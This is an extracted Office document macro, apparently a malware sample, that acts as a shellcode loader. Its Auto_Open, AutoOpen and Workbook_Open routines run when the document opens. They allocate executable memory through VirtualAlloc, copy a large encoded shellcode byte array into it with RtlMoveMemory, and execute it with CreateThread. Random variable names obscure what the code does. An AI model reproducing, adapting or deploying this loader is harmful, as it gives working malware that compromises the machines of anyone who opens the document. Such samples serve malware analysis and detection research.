Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
#If VBA7 Then
    Private Declare PtrSafe Function CreateThread Lib "kernel32" (ByVal Zuyrmbnr As Long, ByVal Oejrwe As Long, ByVal Mlc As LongPtr, Ejk As Long, ByVal Iykl As Long, Cfwmsiee As Long) As LongPtr
    Private Declare PtrSafe Function VirtualAlloc Lib "kernel32" (ByVal Begczmhhs As Long, ByVal Bdfzpbdi As Long, ByVal Mwnqi As Long, ByVal Bnkc As Long) As LongPtr
    Private Declare PtrSafe Function RtlMoveMemory Lib "kernel32" (ByVal Rtxit As LongPtr, ByRef Xfra As Any, ByVal Eixln As Long) As LongPtr
#Else
    Private Declare Function CreateThread Lib "kernel32" (ByVal Zuyrmbnr As Long, ByVal Oejrwe As Long, ByVal Mlc As Long, Ejk As Long, ByVal Iykl As Long, Cfwmsiee As Long) As Long
    Private Declare Function VirtualAlloc Lib "kernel32" (ByVal Begczmhhs As Long, ByVal Bdfzpbdi As Long, ByVal Mwnqi As Long, ByVal Bnkc As Long) As Long
    Private Declare Function RtlMoveMemory Lib "kernel32" (ByVal Rtxit As Long, ByRef Xfra As Any, ByVal Eixln As Long) As Long
#End If

Sub Auto_Open()
    Dim Dvypsaukj As Long, Nwv As Variant, Upvr As Long
#If VBA7 Then
    Dim Kax As LongPtr, Ostzrjyb As LongPtr
#Else
    Dim Kax As Long, Ostzrjyb As Long
#End If
    Nwv = Array(195, 190, 48, 127, 219, 203, 217, 116, 36, 244, 95, 43, 201, 177, 113, 131, 199, 4, 49, 111, 15, 3, 111, 204, 92, 197, 165, 8, 121, 82, 126, 88, 34, 178, 183, 26, 121, 26, 62, 17, 207, 201, 240, 245, 54, 141, 27, 9, 75, 193, 206, 185, 103, 66, 101, 108, 216, 244, 88, 182, 235, 213, 90, 61, 73, 244, 84, 139, 105, 205, 199, 189, 221, 77, 191, 132, 103, 248, 170, 227, _
11, 109, 117, 122, 123, 20, 240, 132, 108, 118, 1, 128, 170, 126, 90, 141, 37, 9, 214, 182, 146, 228, 8, 182, 216, 130, 89, 240, 137, 199, 125, 27, 84, 223, 120, 172, 45, 105, 150, 23, 88, 245, 115, 183, 203, 115, 24, 102, 7, 47, 195, 9, 158, 56, 222, 194, 147, 103, 40, 76, 138, 233, 6, 106, 211, 213, 118, 113, 62, 70, 187, 104, 27, 254, 125, 203, 245, 197, 251, 188, _
65, 155, 6, 52, 118, 255, 190, 171, 161, 150, 145, 35, 6, 66, 179, 139, 15, 108, 2, 164, 135, 232, 60, 78, 193, 161, 130, 254, 137, 150, 153, 212, 151, 246, 143, 108, 232, 129, 234, 187, 89, 106, 20, 156, 33, 183, 104, 120, 163, 240, 248, 255, 196, 143, 159, 89, 242, 42, 96, 218, 212, 244, 169, 53, 18, 241, 100, 111, 98, 59, 206, 79, 212, 186, 186, 19, 1, 39, 150, 54, _
100, 251, 164, 32, 237, 6, 176, 72, 164, 213, 223, 231, 9, 101, 228, 149, 40, 31, 37, 99, 200, 211, 118, 142, 217, 159, 89, 101, 231, 95, 191, 193, 114, 48, 161, 153, 155, 64, 169, 228, 217, 137, 172, 145, 80, 212, 139, 10, 85, 103, 130, 238, 174, 85, 132, 217, 243, 251, 245, 142, 247, 230, 169, 138, 66, 167, 233, 224, 218, 158, 61, 241, 5, 37, 26, 94, 92, 148, 177, 45, _
52, 21, 63, 61, 51, 148, 14, 182, 147, 128, 201, 48, 223, 153, 23, 116, 155, 74, 95, 136, 6, 222, 67, 230, 66, 206, 247, 103, 6, 189, 93, 141, 159, 230, 75, 8, 128, 223, 148, 82, 89, 187, 98, 207, 208, 140, 203, 194, 83, 144, 106, 225, 218, 87, 114, 198, 249, 121, 243, 41, 29, 4, 131, 56, 67, 199, 146, 75, 22, 251, 177, 180, 139, 101, 161, 52, 237, 166, 51, 180, _
233, 160, 238, 237, 187, 173, 87, 242, 64, 218, 93, 195, 5, 146, 29, 29, 100, 112, 133, 42, 49, 113, 16, 223, 117, 132, 152, 118, 214, 3, 236, 58, 12, 157, 54, 199, 23, 87, 81, 105, 103, 158, 165, 222, 45, 106, 64, 93, 180, 174, 42, 187, 228, 92, 97, 64, 126, 144, 194, 140, 242, 6, 255, 4, 217, 190, 8, 97, 60, 140, 232, 62, 246, 235, 43)

    Kax = VirtualAlloc(0, UBound(Nwv), &H1000, &H40)
    For Upvr = LBound(Nwv) To UBound(Nwv)
        Dvypsaukj = Nwv(Upvr)
        Ostzrjyb = RtlMoveMemory(Kax + Upvr, Dvypsaukj, 1)
    Next Upvr
    Ostzrjyb = CreateThread(0, 0, Kax, 0, 0, 0)
End Sub
Sub AutoOpen()
    Auto_Open
End Sub
Sub Workbook_Open()
    Auto_Open
End Sub



INQUEST-PP=macro
